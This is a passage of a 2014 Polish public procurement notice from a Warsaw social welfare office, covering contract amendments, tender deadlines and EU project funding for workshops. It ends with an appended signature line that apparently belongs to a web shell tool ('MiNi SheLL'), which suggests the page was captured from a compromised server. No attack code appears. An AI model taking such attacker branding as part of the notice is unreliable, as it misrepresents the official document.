<p>a)	zmiany liczby osób zrekrutowanych do udziału w warsztatach
b)	zawieszenia przez Zamawiającego wykonywania zamówienia,
c)	działania siły wyższej
d)	jeżeli z powodu nadzwyczajnej zmiany stosunków, spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami lub czego strony nie mogły przewidzieć</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ops-ursus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Plac Czerwca 1976r Nr 1 
02-495 WArszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.05.2014 godzina 09:00, miejsce: Plac Czerwca 1976r NR 1 
02-495 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PO KL działanie 7.1.1 Projekt Ja i moja przyszłość.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com